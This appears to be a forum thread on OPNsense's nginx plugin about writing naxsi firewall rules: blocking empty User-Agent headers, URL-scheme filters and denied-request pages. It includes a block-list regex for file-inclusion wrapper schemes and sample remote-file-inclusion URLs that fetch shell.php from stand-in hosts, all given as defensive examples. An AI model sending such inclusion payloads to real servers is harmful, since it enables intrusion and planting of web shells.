Hello,
I know nginx can use a hook to block an empty user-agent. I want to know whether naxsi could support it?
it should
maybe something like:
MainRule negative id:1700 "rx:^(?!\s*$).+" "msg:Empty_UA" "mz:$HEADERS_VAR_X:User-Agent"
not tested
OK, I will test it. Thanks a lot.
I tested it. It can't block it.
tested it. works:
curl -H "User-Agent;" http://myCA_CRL_URL
*32507 NAXSI_EXLOG: ip=some_ip&server=my_serever&uri=%2Fcrl_file&id=1700&zone=HEADERS&var_name=user-agent&content=, client: some_ip, server: my_server, request: "GET /my.crl HTTP/1.1", host: "my_server"
If you try:
curl -A '' -H 'User-Agent;' http://web -I
Sorry, I made a mistake. It can block it. Thanks a lot.
I want to know about naxsi. It has a "drop connection" option to choose. What is the difference between "block request" and "drop connection"? I tested it. I feel no difference.
https://github.com/nbs-system/naxsi/wiki/rules-bnf
> specify an action such as BLOCK (blocks the request in non-learning mode) or DROP (blocks the request even in learning mode)
DROP is not "DROP connection". It blocks even in learning mode.
So, whether I choose block request or drop connection, it always shows the OPNsense request denied webpage.
Right?
yep
Quote from Fright on November 05, 2020, 11:08:32 AM:
> it should
> maybe something like:
> MainRule negative id:1700 "rx:^(?!\s*$).+" "msg:Empty_UA" "mz:$HEADERS_VAR_X:User-Agent"
> not tested
Hello, I tested it.
If I use a browser like Firefox to open http://ab.aspa.idv.tw, it also shows Request Denied.
You can check http://ab.aspa.idv.tw
and what's in the "HTTP Error logs" for these requests?
*19 NAXSI_FMT: ip=219.84.34.52&server=ab.aspa.idv.tw&uri=/&learning=0&vers=0.56&total_processed=12&total_blocked=10&block=1&cscore0=$policy20906cd5e25e413f9fe6e733c38d3586&score0=16&zone0=HEADERS&id0=15001&var_name0=user-agent&zone1=HEADERS|NAME&id1=15001&var_name1=user-agent, client: 219.84.34.52, server: ab.aspa.idv.tw, request: "GET / HTTP/1.1", host: "ab.aspa.idv.tw"
*19 NAXSI_FMT: ip=219.84.34.52&server=ab.aspa.idv.tw&uri=/favicon.ico&learning=0&vers=0.56&total_processed=13&total_blocked=11&block=1&cscore0=$policy20906cd5e25e413f9fe6e733c38d3586&score0=16&zone0=HEADERS&id0=15001&var_name0=user-agent&zone1=HEADERS|NAME&id1=15001&var_name1=user-agent, client: 219.84.34.52, server: ab.aspa.idv.tw, request: "GET /favicon.ico HTTP/1.1", host: "ab.aspa.idv.tw", referrer: "http://ab.aspa.idv.tw/"
> zone1=HEADERS|NAME
and how exactly does rule 15001 look?
and can you enable "Extensive Naxsi Log" in the server properties and post the NAXSI_EXLOG log for a blocked request?
> MainRule id:15001 "rx:^(?!\s*$).+" "msg:Empty UA" "mz:$HEADERS_VAR_X:User-Agent" "s:$policy20906cd5e25e413f9fe6e733c38d3586:8";
> and can you enable "Extensive Naxsi Log" in the server properties and post the NAXSI_EXLOG log for a blocked request?
Where is this setting? On OPNsense, or on the web server?
> MainRule id:15001 "rx:^(?!\s*$).+" "msg:Empty UA" "mz:$HEADERS_VAR_X:User-Agent"
forgot to negate? now you are blocking any request with a non-empty UA header
MainRule negative id:15001 "rx:^(?!\s*$).+"
"negative" to block requests that do not satisfy "non-empty UA"
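To make the effect of "negative" concrete, here is an added example (my own code, not from the thread or from the naxsi project) that emulates how a single header-zone MainRule with the rx: above scores a request, with and without the negative keyword. It is run over constructed sample requests; the header-matching behaviour it models is an assumption about naxsi, not something taken from its source: header rules are only evaluated against headers that are actually present, so a request that omits User-Agent entirely is not caught by this rule either way.

```python
import re

# Added example: emulate naxsi's "rx:" match plus the "negative" keyword for a
# single header-zone rule (mz:$HEADERS_VAR_X:User-Agent), to compare the rule
# as first posted (no "negative") with the suggested fix.

UA_REGEX = re.compile(r"^(?!\s*$).+")   # the rx: from rule 15001 / 1700


def rule_fires(headers, negative, pattern=UA_REGEX, header="User-Agent"):
    """True if the rule would add its score for this request.

    Assumption about naxsi (not verified against its source): HEADERS-zone
    rules run against headers present in the request, so a request without
    the header never matches, negated or not.
    """
    value = None
    for name, val in headers:
        if name.lower() == header.lower():   # naxsi logs header names lowercased
            value = val
            break
    if value is None:
        return False
    matched = pattern.search(value) is not None
    # "negative" inverts the match: score when the value does NOT satisfy rx:
    return (not matched) if negative else matched


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "firefox":   [("Host", "ab.aspa.idv.tw"),
                  ("User-Agent", "Mozilla/5.0 (X11; Linux x86_64) Firefox/82.0")],
    "empty_ua":  [("Host", "ab.aspa.idv.tw"), ("User-Agent", "")],     # curl -H "User-Agent;"
    "spaces_ua": [("Host", "ab.aspa.idv.tw"), ("User-Agent", "   ")],  # whitespace-only value
    "no_ua":     [("Host", "ab.aspa.idv.tw")],                          # header absent
}


def evaluate(negative):
    """Names of the sample requests the rule would score, sorted."""
    return sorted(name for name, hdrs in SAMPLES.items() if rule_fires(hdrs, negative))


if __name__ == "__main__":
    print("without negative (as first posted):", evaluate(False))
    print("with negative (as suggested):      ", evaluate(True))
```

Without "negative" the only request that scores is the normal Firefox one, which is exactly the id 15001 hit in the NAXSI_FMT lines above; with "negative" only the empty and whitespace-only User-Agent values score, and a client that sends no User-Agent header at all is not affected by this rule.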
> Where is this setting? On OPNsense, or on the web server?
OPN->services->Nginx->configuration->Edit HTTP Server->advanced mode
Ohh... Sorry, I missed this option. Thanks a lot.
Please see the following:
> MainRule id:10000 "str:gopher|doc|php|glob|file|phar|zlib|ftp|ldap|dict|ogg|data\:\/" "msg:URL charset" "mz:URL" "s:$policy1a275df7733e4aef813ecb4917637d40:8"
I want to block some strings in the URL. Did I set it wrong?
> "str:gopher|doc|php|glob|file|phar|zlib|ftp|ldap|dict|ogg|data\:\/"
since you use a regex it should be "rx:" not "str:"
what is the "\:\/" part for?
Sorry, I fixed the full rule:
> MainRule id:10000 "rx:(gopher|doc|php|glob|file|phar|zlib|ftp|ldap|dict|ogg|data)\:\/" "msg:URL charset" "mz:URL" "s:$policy1a275df7733e4aef813ecb4917637d40:8";
I want to block URLs containing strings like ftp:/ or ldap:/. I have changed it to rx. Is that right?
regex looks fine but
can you show an example of a URL you want to block?
The URL zone contains the string between the server name and the first "?" sign (i.e. if https://forum.opnsense.org/index.php?action=post is requested then URL = /index.php, and "action" is an Argument. Arguments of a POST request are in the BODY zone).
so what exactly do you want to block?
like
http://url/php:/
hm. if the question is theoretical, then yes, the rule should work.
but RFI (remote file inclusion) works through parameters (arguments), not the URL itself
(i.e. http://www.example.com/vuln_page.php?file=http://www.hacker.com/shell.php)
and naxsi has examples of obvious RFI protection (IDs 1100-1199)
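The zone distinction in the two replies above is easy to get wrong, so here is an added example (my own code, not from the thread or from naxsi) that splits a GET request target the way naxsi separates the URL zone from ARGS and applies the rx: of rule 10000 to each zone. The sample request targets are constructed; the percent-decoding of the path and the case-insensitive matching are my approximation of naxsi's normalisation, not its actual implementation.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Added example: split a request target into the zones naxsi distinguishes
# (URL = path before the first '?', ARGS = query parameters) and apply the
# rx: from rule 10000 to each, to show where an RFI payload actually lands.

# The rx: from rule 10000; naxsi rx: matches are case-insensitive (assumed here).
SCHEME_RX = re.compile(
    r"(gopher|doc|php|glob|file|phar|zlib|ftp|ldap|dict|ogg|data)\:\/",
    re.IGNORECASE,
)


def split_zones(request_target):
    """Return {'URL': decoded path, 'ARGS': [(name, value), ...]}."""
    parts = urlsplit(request_target)
    return {
        "URL": unquote(parts.path),                       # percent-decoded like naxsi does
        "ARGS": parse_qsl(parts.query, keep_blank_values=True),
    }


def zones_hit(request_target, pattern=SCHEME_RX):
    """Names of zones where the pattern matches. A rule with mz:URL only sees 'URL'."""
    zones = split_zones(request_target)
    hits = []
    if pattern.search(zones["URL"]):
        hits.append("URL")
    if any(pattern.search(k) or pattern.search(v) for k, v in zones["ARGS"]):
        hits.append("ARGS")
    return hits


# Constructed sample request targets (not captured traffic).
SAMPLES = {
    "path_only":   "/php:/",                                            # the thread's example
    "classic_rfi": "/vuln_page.php?file=http://www.hacker.com/shell.php",  # Fright's RFI example
    "ftp_in_arg":  "/vuln_page.php?file=ftp://evil.example/shell.txt",
    "benign":      "/index.php?action=post",
}


def report():
    """Map each sample name to the zones rule 10000's regex would hit."""
    return {name: zones_hit(target) for name, target in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in report().items():
        print(f"{name:12s} -> {hits or ['no match']}")
```

Only the theoretical "/php:/" request is caught in the URL zone, so a rule with mz:URL never sees the classic RFI payload; that payload sits in ARGS, and even there the scheme list of rule 10000 does not include http, so a rule on mz:ARGS with the same regex would still miss it.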
Hello,
Could I redirect the client to a 403 page when a rule matches?
I did not understand the question.
you want to send a 403 status? change the html page?
yes you can
https://github.com/nbs-system/naxsi/wiki/directives#deniedurl
> when a rule matches?
when access is blocked.
DeniedUrl is a directive in the location block. you can't set it for one rule
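For reference, here is what the DeniedUrl wiring looks like in a hand-written nginx configuration. This is an added example, not configuration from the thread or from OPNsense (which generates the equivalent from its GUI): the upstream name, the CheckRule thresholds and the score names are placeholders, and the 403 applies to every blocked request in that location, not to one rule.

```nginx
# Added example: naxsi enabled in a location, with blocked requests sent to
# an internal location that answers 403. Names and thresholds are assumed.
location / {
    SecRulesEnabled;                 # enforce (LearningMode; would only log)
    DeniedUrl "/RequestDenied";      # where naxsi internally redirects blocked requests
    CheckRule "$SQL >= 8" BLOCK;     # standard naxsi score names; OPNsense uses $policy... ids
    CheckRule "$RFI >= 8" BLOCK;
    CheckRule "$TRAVERSAL >= 4" BLOCK;
    CheckRule "$XSS >= 8" BLOCK;
    proxy_pass http://backend;       # assumed upstream name
}

location /RequestDenied {
    internal;                        # only reachable via naxsi's internal redirect
    return 403;                      # or: error_page 403 /denied.html; to serve a custom page
}
```

Because DeniedUrl is per location, the only per-rule control you have is the score a rule adds ("s:...") and the CheckRule threshold it contributes to; a rule that should not cause a block can simply be given a score below the threshold.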